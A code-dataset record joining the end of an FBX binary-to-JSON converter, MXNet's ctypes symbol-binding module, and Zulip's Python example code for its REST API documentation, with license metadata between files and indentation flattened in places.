elem_id = read_string_ubyte(read) # elem name of the scope/key
elem_props_type = bytearray(prop_count) # elem property types
elem_props_data = [None] * prop_count # elem properties (if any)
elem_subtree = [] # elem children (if any)
for i in range(prop_count):
data_type = read(1)[0]
elem_props_data[i] = read_data_dict[data_type](read)
elem_props_type[i] = data_type
if tell() < end_offset:
while tell() < (end_offset - _BLOCK_SENTINEL_LENGTH):
elem_subtree.append(read_elem(read, tell, use_namedtuple))
if read(_BLOCK_SENTINEL_LENGTH) != _BLOCK_SENTINEL_DATA:
raise IOError("failed to read nested block sentinel, "
"expected all bytes to be 0")
if tell() != end_offset:
raise IOError("scope length not reached, something is wrong")
args = (elem_id, elem_props_data, elem_props_type, elem_subtree)
return FBXElem(*args) if use_namedtuple else args
def parse_version(fn):
"""
Return the FBX version,
if the file isn't a binary FBX return zero.
"""
with open(fn, 'rb') as f:
read = f.read
if read(len(_HEAD_MAGIC)) != _HEAD_MAGIC:
return 0
return read_uint(read)
def parse(fn, use_namedtuple=True):
root_elems = []
with open(fn, 'rb') as f:
read = f.read
tell = f.tell
if read(len(_HEAD_MAGIC)) != _HEAD_MAGIC:
raise IOError("Invalid header")
fbx_version = read_uint(read)
while True:
elem = read_elem(read, tell, use_namedtuple)
if elem is None:
break
root_elems.append(elem)
args = (b'', [], bytearray(0), root_elems)
return FBXElem(*args) if use_namedtuple else args, fbx_version
# ----------------------------------------------------------------------------
# Inline Modules
# pyfbx.data_types
data_types = type(array)("data_types")
data_types.__dict__.update(
dict(
INT16 = b'Y'[0],
BOOL = b'C'[0],
INT32 = b'I'[0],
FLOAT32 = b'F'[0],
FLOAT64 = b'D'[0],
INT64 = b'L'[0],
BYTES = b'R'[0],
STRING = b'S'[0],
FLOAT32_ARRAY = b'f'[0],
INT32_ARRAY = b'i'[0],
FLOAT64_ARRAY = b'd'[0],
INT64_ARRAY = b'l'[0],
BOOL_ARRAY = b'b'[0],
BYTE_ARRAY = b'c'[0],
))
# pyfbx.parse_bin
parse_bin = type(array)("parse_bin")
parse_bin.__dict__.update(
dict(
parse = parse
))
# ----------------------------------------------------------------------------
# JSON Converter
# from pyfbx import parse_bin, data_types
import json
import array
def fbx2json_property_as_string(prop, prop_type):
if prop_type == data_types.STRING:
prop_str = prop.decode('utf-8')
prop_str = prop_str.replace('\x00\x01', '::')
return json.dumps(prop_str)
else:
prop_py_type = type(prop)
if prop_py_type == bytes:
return json.dumps(repr(prop)[2:-1])
elif prop_py_type == bool:
return json.dumps(prop)
elif prop_py_type == array.array:
return repr(list(prop))
return repr(prop)
def fbx2json_properties_as_string(fbx_elem):
return ", ".join(fbx2json_property_as_string(*prop_item)
for prop_item in zip(fbx_elem.props,
fbx_elem.props_type))
def fbx2json_recurse(fw, fbx_elem, ident, is_last):
fbx_elem_id = fbx_elem.id.decode('utf-8')
fw('%s["%s", ' % (ident, fbx_elem_id))
fw('[%s], ' % fbx2json_properties_as_string(fbx_elem))
fw('"%s", ' % (fbx_elem.props_type.decode('ascii')))
fw('[')
if fbx_elem.elems:
fw('\n')
ident_sub = ident + " "
for fbx_elem_sub in fbx_elem.elems:
fbx2json_recurse(fw, fbx_elem_sub, ident_sub,
fbx_elem_sub is fbx_elem.elems[-1])
fw(']')
fw(']%s' % ('' if is_last else ',\n'))
def fbx2json(fn):
import os
fn_json = "%s.json" % os.path.splitext(fn)[0]
print("Writing: %r " % fn_json, end="")
fbx_root_elem, fbx_version = parse(fn, use_namedtuple=True)
print("(Version %d) ..." % fbx_version)
with open(fn_json, 'w', encoding="ascii", errors='xmlcharrefreplace') as f:
fw = f.write
fw('[\n')
ident_sub = " "
for fbx_elem_sub in fbx_root_elem.elems:
fbx2json_recurse(f.write, fbx_elem_sub, ident_sub,
fbx_elem_sub is fbx_root_elem.elems[-1])
fw(']\n')
# ----------------------------------------------------------------------------
# Command Line
def main():
import sys
if "--help" in sys.argv:
print(__doc__)
return
for arg in sys.argv[1:]:
try:
fbx2json(arg)
except:
print("Failed to convert %r, error:" % arg)
import traceback
traceback.print_exc()
if __name__ == "__main__":
main()
| gpl-2.0 | -8,405,879,069,700,308,000 | 27.351515 | 79 | 0.575246 | false |
precedenceguo/mxnet | python/mxnet/_ctypes/symbol.py | 28 | 4282 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# coding: utf-8
# pylint: disable=invalid-name, protected-access, too-many-arguments, global-statement
"""Symbolic configuration API."""
from __future__ import absolute_import as _abs
import ctypes
from ..base import _LIB
from ..base import c_str_array, c_handle_array, c_str, mx_uint
from ..base import SymbolHandle
from ..base import check_call
_symbol_cls = None
class SymbolBase(object):
"""Symbol is symbolic graph."""
__slots__ = ["handle"]
# pylint: disable=no-member
def __init__(self, handle):
"""Initialize the function with handle
Parameters
----------
handle : SymbolHandle
the handle to the underlying C++ Symbol
"""
self.handle = handle
def __del__(self):
check_call(_LIB.NNSymbolFree(self.handle))
def _compose(self, *args, **kwargs):
"""Compose symbol on inputs.
This call mutates the current symbol.
Parameters
----------
args:
provide positional arguments
kwargs:
provide keyword arguments
Returns
-------
the resulting symbol
"""
name = kwargs.pop('name', None)
if name:
name = c_str(name)
if len(args) != 0 and len(kwargs) != 0:
raise TypeError('compose only accept input Symbols \
either as positional or keyword arguments, not both')
for arg in args:
if not isinstance(arg, SymbolBase):
raise TypeError('Compose expect `Symbol` as arguments')
for val in kwargs.values():
if not isinstance(val, SymbolBase):
raise TypeError('Compose expect `Symbol` as arguments')
num_args = len(args) + len(kwargs)
if len(kwargs) != 0:
keys = c_str_array(kwargs.keys())
args = c_handle_array(kwargs.values())
else:
keys = None
            # Positional composition: the handles come from the positional args,
            # not from the (empty) kwargs.
            args = c_handle_array(args)
check_call(_LIB.NNSymbolCompose(
self.handle, name, num_args, keys, args))
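    # Illustrative sketch (not executed here): assuming `net` and `data` are
    # SymbolBase instances created through the usual symbol factory functions,
    # keyword composition binds `data` to the input argument named "data":
    #
    #   net._compose(data=data, name="fc1")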
def _set_attr(self, **kwargs):
"""Set the attribute of the symbol.
Parameters
----------
**kwargs
The attributes to set
"""
keys = c_str_array(kwargs.keys())
vals = c_str_array([str(s) for s in kwargs.values()])
num_args = mx_uint(len(kwargs))
check_call(_LIB.MXSymbolSetAttrs(
self.handle, num_args, keys, vals))
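    # Illustrative sketch (the attribute name and value are assumptions, not
    # part of this module): any string-convertible key/value pairs are
    # forwarded to MXSymbolSetAttrs, e.g.
    #
    #   sym._set_attr(lr_mult="0.5")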
def _set_handle(self, handle):
"""Set handle."""
self.handle = handle
def __reduce__(self):
return (_symbol_cls, (None,), self.__getstate__())
def _set_symbol_class(cls):
"""Set the symbolic class to be cls"""
global _symbol_cls
_symbol_cls = cls
def _symbol_creator(handle, args, kwargs, keys, vals, name):
sym_handle = SymbolHandle()
check_call(_LIB.MXSymbolCreateAtomicSymbol(
ctypes.c_void_p(handle),
mx_uint(len(keys)),
c_str_array(keys),
c_str_array([str(v) for v in vals]),
ctypes.byref(sym_handle)))
if args and kwargs:
raise TypeError(
                'Operators with variable length input can only accept input '
'Symbols either as positional or keyword arguments, not both')
s = _symbol_cls(sym_handle)
if args:
s._compose(*args, name=name)
elif kwargs:
s._compose(name=name, **kwargs)
else:
s._compose(name=name)
return s
| apache-2.0 | -5,679,928,344,425,097,000 | 30.028986 | 87 | 0.606959 | false |
punchagan/zulip | zerver/openapi/python_examples.py | 1 | 48058 | # Zulip's OpenAPI-based API documentation system is documented at
# https://zulip.readthedocs.io/en/latest/documentation/api.html
#
# This file defines the Python code examples that appears in Zulip's
# REST API documentation, and also contains a system for running the
# example code as part of the `tools/test-api` test suite.
#
# The actual documentation appears within these blocks:
# # {code_example|start}
# Code here
# # {code_example|end}
#
# Whereas the surrounding code is test setup logic.
import json
import os
import sys
from functools import wraps
from typing import Any, Callable, Dict, Iterable, List, Optional, Set, TypeVar, cast
from zulip import Client
from zerver.lib import mdiff
from zerver.models import get_realm, get_user
from zerver.openapi.openapi import validate_against_openapi_schema
ZULIP_DIR = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
TEST_FUNCTIONS: Dict[str, Callable[..., object]] = {}
REGISTERED_TEST_FUNCTIONS: Set[str] = set()
CALLED_TEST_FUNCTIONS: Set[str] = set()
FuncT = TypeVar("FuncT", bound=Callable[..., object])
def openapi_test_function(endpoint: str) -> Callable[[FuncT], FuncT]:
"""This decorator is used to register an OpenAPI test function with
its endpoint. Example usage:
@openapi_test_function("/messages/render:post")
def ...
"""
def wrapper(test_func: FuncT) -> FuncT:
@wraps(test_func)
def _record_calls_wrapper(*args: object, **kwargs: object) -> object:
CALLED_TEST_FUNCTIONS.add(test_func.__name__)
return test_func(*args, **kwargs)
REGISTERED_TEST_FUNCTIONS.add(test_func.__name__)
TEST_FUNCTIONS[endpoint] = _record_calls_wrapper
return cast(FuncT, _record_calls_wrapper) # https://github.com/python/mypy/issues/1927
return wrapper
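# A minimal sketch of how a documented endpoint example is laid out (kept as a
# comment so this hypothetical endpoint is not registered and cannot trip the
# REGISTERED/CALLED consistency check at the bottom of this file):
#
#   @openapi_test_function("/example/endpoint:get")
#   def get_example(client: Client) -> None:
#       # {code_example|start}
#       result = client.call_endpoint(url="/example/endpoint", method="GET")
#       # {code_example|end}
#       validate_against_openapi_schema(result, "/example/endpoint", "get", "200")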
def ensure_users(ids_list: List[int], user_names: List[str]) -> None:
# Ensure that the list of user ids (ids_list)
# matches the users we want to refer to (user_names).
realm = get_realm("zulip")
user_ids = [get_user(name + "@zulip.com", realm).id for name in user_names]
assert ids_list == user_ids
@openapi_test_function("/users/me/subscriptions:post")
def add_subscriptions(client: Client) -> None:
# {code_example|start}
# Subscribe to the stream "new stream"
result = client.add_subscriptions(
streams=[
{
"name": "new stream",
"description": "New stream for testing",
},
],
)
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/subscriptions", "post", "200_0")
# {code_example|start}
# To subscribe other users to a stream, you may pass
# the `principals` argument, like so:
user_id = 26
result = client.add_subscriptions(
streams=[
{"name": "new stream", "description": "New stream for testing"},
],
principals=[user_id],
)
# {code_example|end}
assert result["result"] == "success"
assert "[email protected]" in result["subscribed"]
def test_add_subscriptions_already_subscribed(client: Client) -> None:
result = client.add_subscriptions(
streams=[
{"name": "new stream", "description": "New stream for testing"},
],
principals=["[email protected]"],
)
validate_against_openapi_schema(result, "/users/me/subscriptions", "post", "200_1")
def test_authorization_errors_fatal(client: Client, nonadmin_client: Client) -> None:
client.add_subscriptions(
streams=[
{"name": "private_stream"},
],
)
stream_id = client.get_stream_id("private_stream")["stream_id"]
client.call_endpoint(
f"streams/{stream_id}",
method="PATCH",
request={"is_private": True},
)
result = nonadmin_client.add_subscriptions(
streams=[
{"name": "private_stream"},
],
authorization_errors_fatal=False,
)
validate_against_openapi_schema(result, "/users/me/subscriptions", "post", "400_0")
result = nonadmin_client.add_subscriptions(
streams=[
{"name": "private_stream"},
],
authorization_errors_fatal=True,
)
validate_against_openapi_schema(result, "/users/me/subscriptions", "post", "400_1")
@openapi_test_function("/users/{user_id_or_email}/presence:get")
def get_user_presence(client: Client) -> None:
# {code_example|start}
# Get presence information for "[email protected]"
result = client.get_user_presence("[email protected]")
# {code_example|end}
validate_against_openapi_schema(result, "/users/{user_id_or_email}/presence", "get", "200")
@openapi_test_function("/users/me/presence:post")
def update_presence(client: Client) -> None:
request = {
"status": "active",
"ping_only": False,
"new_user_input": False,
}
result = client.update_presence(request)
assert result["result"] == "success"
@openapi_test_function("/users:post")
def create_user(client: Client) -> None:
# {code_example|start}
# Create a user
request = {
"email": "[email protected]",
"password": "temp",
"full_name": "New User",
}
result = client.create_user(request)
# {code_example|end}
validate_against_openapi_schema(result, "/users", "post", "200")
# Test "Email already used error"
result = client.create_user(request)
validate_against_openapi_schema(result, "/users", "post", "400")
@openapi_test_function("/users:get")
def get_members(client: Client) -> None:
# {code_example|start}
# Get all users in the realm
result = client.get_members()
# {code_example|end}
validate_against_openapi_schema(result, "/users", "get", "200")
members = [m for m in result["members"] if m["email"] == "[email protected]"]
assert len(members) == 1
newbie = members[0]
assert not newbie["is_admin"]
assert newbie["full_name"] == "New User"
# {code_example|start}
# You may pass the `client_gravatar` query parameter as follows:
result = client.get_members({"client_gravatar": True})
# {code_example|end}
validate_against_openapi_schema(result, "/users", "get", "200")
assert result["members"][0]["avatar_url"] is None
# {code_example|start}
# You may pass the `include_custom_profile_fields` query parameter as follows:
result = client.get_members({"include_custom_profile_fields": True})
# {code_example|end}
validate_against_openapi_schema(result, "/users", "get", "200")
for member in result["members"]:
if member["is_bot"]:
assert member.get("profile_data", None) is None
else:
assert member.get("profile_data", None) is not None
@openapi_test_function("/users/{email}:get")
def get_user_by_email(client: Client) -> None:
# {code_example|start}
# Fetch details on a user given a user ID
email = "[email protected]"
result = client.call_endpoint(
url=f"/users/{email}",
method="GET",
)
# {code_example|end}
validate_against_openapi_schema(result, "/users/{email}", "get", "200")
@openapi_test_function("/users/{user_id}:get")
def get_single_user(client: Client) -> None:
# {code_example|start}
# Fetch details on a user given a user ID
user_id = 8
result = client.get_user_by_id(user_id)
# {code_example|end}
validate_against_openapi_schema(result, "/users/{user_id}", "get", "200")
# {code_example|start}
# If you'd like data on custom profile fields, you can request them as follows:
result = client.get_user_by_id(user_id, include_custom_profile_fields=True)
# {code_example|end}
validate_against_openapi_schema(result, "/users/{user_id}", "get", "200")
@openapi_test_function("/users/{user_id}:delete")
def deactivate_user(client: Client) -> None:
# {code_example|start}
# Deactivate a user
user_id = 8
result = client.deactivate_user_by_id(user_id)
# {code_example|end}
validate_against_openapi_schema(result, "/users/{user_id}", "delete", "200")
@openapi_test_function("/users/{user_id}/reactivate:post")
def reactivate_user(client: Client) -> None:
# {code_example|start}
# Reactivate a user
user_id = 8
result = client.reactivate_user_by_id(user_id)
# {code_example|end}
validate_against_openapi_schema(result, "/users/{user_id}/reactivate", "post", "200")
@openapi_test_function("/users/{user_id}:patch")
def update_user(client: Client) -> None:
# {code_example|start}
# Change a user's full name.
user_id = 10
result = client.update_user_by_id(user_id, full_name="New Name")
# {code_example|end}
validate_against_openapi_schema(result, "/users/{user_id}", "patch", "200")
# {code_example|start}
# Change value of the custom profile field with ID 9.
user_id = 8
result = client.update_user_by_id(user_id, profile_data=[{"id": 9, "value": "some data"}])
# {code_example|end}
validate_against_openapi_schema(result, "/users/{user_id}", "patch", "400")
@openapi_test_function("/users/{user_id}/subscriptions/{stream_id}:get")
def get_subscription_status(client: Client) -> None:
# {code_example|start}
# Check whether a user is a subscriber to a given stream.
user_id = 7
stream_id = 1
result = client.call_endpoint(
url=f"/users/{user_id}/subscriptions/{stream_id}",
method="GET",
)
# {code_example|end}
validate_against_openapi_schema(
result, "/users/{user_id}/subscriptions/{stream_id}", "get", "200"
)
@openapi_test_function("/realm/linkifiers:get")
def get_realm_linkifiers(client: Client) -> None:
# {code_example|start}
# Fetch all the filters in this organization
result = client.call_endpoint(
url="/realm/linkifiers",
method="GET",
)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/linkifiers", "get", "200")
@openapi_test_function("/realm/profile_fields:get")
def get_realm_profile_fields(client: Client) -> None:
# {code_example|start}
# Fetch all the custom profile fields in the user's organization.
result = client.call_endpoint(
url="/realm/profile_fields",
method="GET",
)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/profile_fields", "get", "200")
@openapi_test_function("/realm/profile_fields:patch")
def reorder_realm_profile_fields(client: Client) -> None:
# {code_example|start}
# Reorder the custom profile fields in the user's organization.
order = [8, 7, 6, 5, 4, 3, 2, 1]
request = {"order": json.dumps(order)}
result = client.call_endpoint(url="/realm/profile_fields", method="PATCH", request=request)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/profile_fields", "patch", "200")
@openapi_test_function("/realm/profile_fields:post")
def create_realm_profile_field(client: Client) -> None:
# {code_example|start}
# Create a custom profile field in the user's organization.
request = {"name": "Phone", "hint": "Contact No.", "field_type": 1}
result = client.call_endpoint(url="/realm/profile_fields", method="POST", request=request)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/profile_fields", "post", "200")
@openapi_test_function("/realm/filters:post")
def add_realm_filter(client: Client) -> None:
# {code_example|start}
# Add a filter to automatically linkify #<number> to the corresponding
# issue in Zulip's server repo
result = client.add_realm_filter(
"#(?P<id>[0-9]+)", "https://github.com/zulip/zulip/issues/%(id)s"
)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/filters", "post", "200")
@openapi_test_function("/realm/filters/{filter_id}:patch")
def update_realm_filter(client: Client) -> None:
# {code_example|start}
# Update the linkifier (realm_filter) with ID 1
filter_id = 1
request = {
"pattern": "#(?P<id>[0-9]+)",
"url_format_string": "https://github.com/zulip/zulip/issues/%(id)s",
}
result = client.call_endpoint(
url=f"/realm/filters/{filter_id}", method="PATCH", request=request
)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/filters/{filter_id}", "patch", "200")
@openapi_test_function("/realm/filters/{filter_id}:delete")
def remove_realm_filter(client: Client) -> None:
# {code_example|start}
# Remove the linkifier (realm_filter) with ID 1
result = client.remove_realm_filter(1)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/filters/{filter_id}", "delete", "200")
@openapi_test_function("/realm/playgrounds:post")
def add_realm_playground(client: Client) -> None:
# {code_example|start}
# Add a realm playground for Python
request = {
"name": "Python playground",
"pygments_language": "Python",
"url_prefix": "https://python.example.com",
}
result = client.call_endpoint(url="/realm/playgrounds", method="POST", request=request)
# {code_example|end}
validate_against_openapi_schema(result, "/realm/playgrounds", "post", "200")
@openapi_test_function("/realm/playgrounds/{playground_id}:delete")
def remove_realm_playground(client: Client) -> None:
# {code_example|start}
# Remove the playground with ID 1
result = client.call_endpoint(url="/realm/playgrounds/1", method="DELETE")
# {code_example|end}
validate_against_openapi_schema(result, "/realm/playgrounds/{playground_id}", "delete", "200")
@openapi_test_function("/users/me:get")
def get_profile(client: Client) -> None:
# {code_example|start}
# Get the profile of the user/bot that requests this endpoint,
# which is `client` in this case:
result = client.get_profile()
# {code_example|end}
validate_against_openapi_schema(result, "/users/me", "get", "200")
@openapi_test_function("/users/me:delete")
def deactivate_own_user(client: Client, owner_client: Client) -> None:
user_id = client.get_profile()["user_id"]
# {code_example|start}
# Deactivate the account of the current user/bot that requests.
result = client.call_endpoint(
url="/users/me",
method="DELETE",
)
# {code_example|end}
# Reactivate the account to avoid polluting other tests.
owner_client.reactivate_user_by_id(user_id)
validate_against_openapi_schema(result, "/users/me", "delete", "200")
@openapi_test_function("/get_stream_id:get")
def get_stream_id(client: Client) -> int:
# {code_example|start}
# Get the ID of a given stream
stream_name = "new stream"
result = client.get_stream_id(stream_name)
# {code_example|end}
validate_against_openapi_schema(result, "/get_stream_id", "get", "200")
return result["stream_id"]
@openapi_test_function("/streams/{stream_id}:delete")
def archive_stream(client: Client, stream_id: int) -> None:
result = client.add_subscriptions(
streams=[
{
"name": "stream to be archived",
"description": "New stream for testing",
},
],
)
# {code_example|start}
# Archive the stream named 'stream to be archived'
stream_id = client.get_stream_id("stream to be archived")["stream_id"]
result = client.delete_stream(stream_id)
# {code_example|end}
validate_against_openapi_schema(result, "/streams/{stream_id}", "delete", "200")
assert result["result"] == "success"
@openapi_test_function("/streams:get")
def get_streams(client: Client) -> None:
# {code_example|start}
# Get all streams that the user has access to
result = client.get_streams()
# {code_example|end}
validate_against_openapi_schema(result, "/streams", "get", "200")
streams = [s for s in result["streams"] if s["name"] == "new stream"]
assert streams[0]["description"] == "New stream for testing"
# {code_example|start}
# You may pass in one or more of the query parameters mentioned above
# as keyword arguments, like so:
result = client.get_streams(include_public=False)
# {code_example|end}
validate_against_openapi_schema(result, "/streams", "get", "200")
assert len(result["streams"]) == 4
@openapi_test_function("/streams/{stream_id}:patch")
def update_stream(client: Client, stream_id: int) -> None:
# {code_example|start}
# Update the stream by a given ID
request = {
"stream_id": stream_id,
"stream_post_policy": 2,
"is_private": True,
}
result = client.update_stream(request)
# {code_example|end}
validate_against_openapi_schema(result, "/streams/{stream_id}", "patch", "200")
assert result["result"] == "success"
@openapi_test_function("/user_groups:get")
def get_user_groups(client: Client) -> int:
# {code_example|start}
# Get all user groups of the realm
result = client.get_user_groups()
# {code_example|end}
validate_against_openapi_schema(result, "/user_groups", "get", "200")
hamlet_user_group = [u for u in result["user_groups"] if u["name"] == "hamletcharacters"][0]
assert hamlet_user_group["description"] == "Characters of Hamlet"
marketing_user_group = [u for u in result["user_groups"] if u["name"] == "marketing"][0]
return marketing_user_group["id"]
def test_user_not_authorized_error(nonadmin_client: Client) -> None:
result = nonadmin_client.get_streams(include_all_active=True)
validate_against_openapi_schema(result, "/rest-error-handling", "post", "400_2")
def get_subscribers(client: Client) -> None:
result = client.get_subscribers(stream="new stream")
assert result["subscribers"] == ["[email protected]", "[email protected]"]
def get_user_agent(client: Client) -> None:
result = client.get_user_agent()
assert result.startswith("ZulipPython/")
@openapi_test_function("/users/me/subscriptions:get")
def list_subscriptions(client: Client) -> None:
# {code_example|start}
# Get all streams that the user is subscribed to
result = client.list_subscriptions()
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/subscriptions", "get", "200")
streams = [s for s in result["subscriptions"] if s["name"] == "new stream"]
assert streams[0]["description"] == "New stream for testing"
@openapi_test_function("/users/me/subscriptions:delete")
def remove_subscriptions(client: Client) -> None:
# {code_example|start}
# Unsubscribe from the stream "new stream"
result = client.remove_subscriptions(
["new stream"],
)
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/subscriptions", "delete", "200")
# test it was actually removed
result = client.list_subscriptions()
assert result["result"] == "success"
streams = [s for s in result["subscriptions"] if s["name"] == "new stream"]
assert len(streams) == 0
# {code_example|start}
# Unsubscribe another user from the stream "new stream"
result = client.remove_subscriptions(
["new stream"],
principals=["[email protected]"],
)
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/subscriptions", "delete", "200")
@openapi_test_function("/users/me/subscriptions/muted_topics:patch")
def toggle_mute_topic(client: Client) -> None:
# Send a test message
message = {
"type": "stream",
"to": "Denmark",
"topic": "boat party",
}
client.call_endpoint(
url="messages",
method="POST",
request=message,
)
# {code_example|start}
# Mute the topic "boat party" in the stream "Denmark"
request = {
"stream": "Denmark",
"topic": "boat party",
"op": "add",
}
result = client.mute_topic(request)
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/subscriptions/muted_topics", "patch", "200")
# {code_example|start}
# Unmute the topic "boat party" in the stream "Denmark"
request = {
"stream": "Denmark",
"topic": "boat party",
"op": "remove",
}
result = client.mute_topic(request)
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/subscriptions/muted_topics", "patch", "200")
@openapi_test_function("/users/me/muted_users/{muted_user_id}:post")
def add_user_mute(client: Client) -> None:
ensure_users([10], ["hamlet"])
# {code_example|start}
# Mute user with ID 10
muted_user_id = 10
result = client.call_endpoint(url=f"/users/me/muted_users/{muted_user_id}", method="POST")
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/muted_users/{muted_user_id}", "post", "200")
@openapi_test_function("/users/me/muted_users/{muted_user_id}:delete")
def remove_user_mute(client: Client) -> None:
ensure_users([10], ["hamlet"])
# {code_example|start}
# Unmute user with ID 10
muted_user_id = 10
result = client.call_endpoint(url=f"/users/me/muted_users/{muted_user_id}", method="DELETE")
# {code_example|end}
validate_against_openapi_schema(
result, "/users/me/muted_users/{muted_user_id}", "delete", "200"
)
@openapi_test_function("/mark_all_as_read:post")
def mark_all_as_read(client: Client) -> None:
# {code_example|start}
# Mark all of the user's unread messages as read
result = client.mark_all_as_read()
# {code_example|end}
validate_against_openapi_schema(result, "/mark_all_as_read", "post", "200")
@openapi_test_function("/mark_stream_as_read:post")
def mark_stream_as_read(client: Client) -> None:
# {code_example|start}
# Mark the unread messages in stream with ID "1" as read
result = client.mark_stream_as_read(1)
# {code_example|end}
validate_against_openapi_schema(result, "/mark_stream_as_read", "post", "200")
@openapi_test_function("/mark_topic_as_read:post")
def mark_topic_as_read(client: Client) -> None:
# Grab an existing topic name
topic_name = client.get_stream_topics(1)["topics"][0]["name"]
# {code_example|start}
# Mark the unread messages in stream 1's topic "topic_name" as read
result = client.mark_topic_as_read(1, topic_name)
# {code_example|end}
validate_against_openapi_schema(result, "/mark_stream_as_read", "post", "200")
@openapi_test_function("/users/me/subscriptions/properties:post")
def update_subscription_settings(client: Client) -> None:
# {code_example|start}
# Update the user's subscription in stream #1 to pin it to the top of the
    # stream list; and in stream #3 to have the hex color "#f00f00"
request = [
{
"stream_id": 1,
"property": "pin_to_top",
"value": True,
},
{
"stream_id": 3,
"property": "color",
"value": "#f00f00",
},
]
result = client.update_subscription_settings(request)
# {code_example|end}
validate_against_openapi_schema(result, "/users/me/subscriptions/properties", "POST", "200")
@openapi_test_function("/messages/render:post")
def render_message(client: Client) -> None:
# {code_example|start}
# Render a message
request = {
"content": "**foo**",
}
result = client.render_message(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/render", "post", "200")
@openapi_test_function("/messages:get")
def get_messages(client: Client) -> None:
# {code_example|start}
# Get the 100 last messages sent by "[email protected]" to the stream "Verona"
request: Dict[str, Any] = {
"anchor": "newest",
"num_before": 100,
"num_after": 0,
"narrow": [
{"operator": "sender", "operand": "[email protected]"},
{"operator": "stream", "operand": "Verona"},
],
}
result = client.get_messages(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages", "get", "200")
assert len(result["messages"]) <= request["num_before"]
@openapi_test_function("/messages/matches_narrow:get")
def check_messages_match_narrow(client: Client) -> None:
message = {"type": "stream", "to": "Verona", "topic": "test_topic", "content": "http://foo.com"}
msg_ids = []
response = client.send_message(message)
msg_ids.append(response["id"])
message["content"] = "no link here"
response = client.send_message(message)
msg_ids.append(response["id"])
# {code_example|start}
# Check which messages within an array match a narrow.
request = {
"msg_ids": msg_ids,
"narrow": [{"operator": "has", "operand": "link"}],
}
result = client.call_endpoint(url="messages/matches_narrow", method="GET", request=request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/matches_narrow", "get", "200")
@openapi_test_function("/messages/{message_id}:get")
def get_raw_message(client: Client, message_id: int) -> None:
assert int(message_id)
# {code_example|start}
# Get the raw content of the message with ID "message_id"
result = client.get_raw_message(message_id)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/{message_id}", "get", "200")
@openapi_test_function("/attachments:get")
def get_attachments(client: Client) -> None:
# {code_example|start}
# Get your attachments.
result = client.get_attachments()
# {code_example|end}
validate_against_openapi_schema(result, "/attachments", "get", "200")
@openapi_test_function("/messages:post")
def send_message(client: Client) -> int:
request: Dict[str, Any] = {}
# {code_example|start}
# Send a stream message
request = {
"type": "stream",
"to": "Denmark",
"topic": "Castle",
"content": "I come not, friends, to steal away your hearts.",
}
result = client.send_message(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages", "post", "200")
# test that the message was actually sent
message_id = result["id"]
url = "messages/" + str(message_id)
result = client.call_endpoint(
url=url,
method="GET",
)
assert result["result"] == "success"
assert result["raw_content"] == request["content"]
ensure_users([10], ["hamlet"])
# {code_example|start}
# Send a private message
user_id = 10
request = {
"type": "private",
"to": [user_id],
"content": "With mirth and laughter let old wrinkles come.",
}
result = client.send_message(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages", "post", "200")
# test that the message was actually sent
message_id = result["id"]
url = "messages/" + str(message_id)
result = client.call_endpoint(
url=url,
method="GET",
)
assert result["result"] == "success"
assert result["raw_content"] == request["content"]
return message_id
@openapi_test_function("/messages/{message_id}/reactions:post")
def add_reaction(client: Client, message_id: int) -> None:
request: Dict[str, Any] = {}
# {code_example|start}
# Add an emoji reaction
request = {
"message_id": message_id,
"emoji_name": "octopus",
}
result = client.add_reaction(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/{message_id}/reactions", "post", "200")
@openapi_test_function("/messages/{message_id}/reactions:delete")
def remove_reaction(client: Client, message_id: int) -> None:
request: Dict[str, Any] = {}
# {code_example|start}
# Remove an emoji reaction
request = {
"message_id": message_id,
"emoji_name": "octopus",
}
result = client.remove_reaction(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/{message_id}/reactions", "delete", "200")
def test_nonexistent_stream_error(client: Client) -> None:
request = {
"type": "stream",
"to": "nonexistent_stream",
"topic": "Castle",
"content": "I come not, friends, to steal away your hearts.",
}
result = client.send_message(request)
validate_against_openapi_schema(result, "/messages", "post", "400_0")
def test_private_message_invalid_recipient(client: Client) -> None:
request = {
"type": "private",
"to": "[email protected]",
"content": "With mirth and laughter let old wrinkles come.",
}
result = client.send_message(request)
validate_against_openapi_schema(result, "/messages", "post", "400_1")
@openapi_test_function("/messages/{message_id}:patch")
def update_message(client: Client, message_id: int) -> None:
assert int(message_id)
# {code_example|start}
# Edit a message
# (make sure that message_id below is set to the ID of the
# message you wish to update)
request = {
"message_id": message_id,
"content": "New content",
}
result = client.update_message(request)
# {code_example|end}
validate_against_openapi_schema(result, "/messages/{message_id}", "patch", "200")
# test it was actually updated
url = "messages/" + str(message_id)
result = client.call_endpoint(
url=url,
method="GET",
)
assert result["result"] == "success"
assert result["raw_content"] == request["content"]
def test_update_message_edit_permission_error(client: Client, nonadmin_client: Client) -> None:
request = {
"type": "stream",
"to": "Denmark",
"topic": "Castle",
"content": "I come not, friends, to steal away your hearts.",
}
result = client.send_message(request)
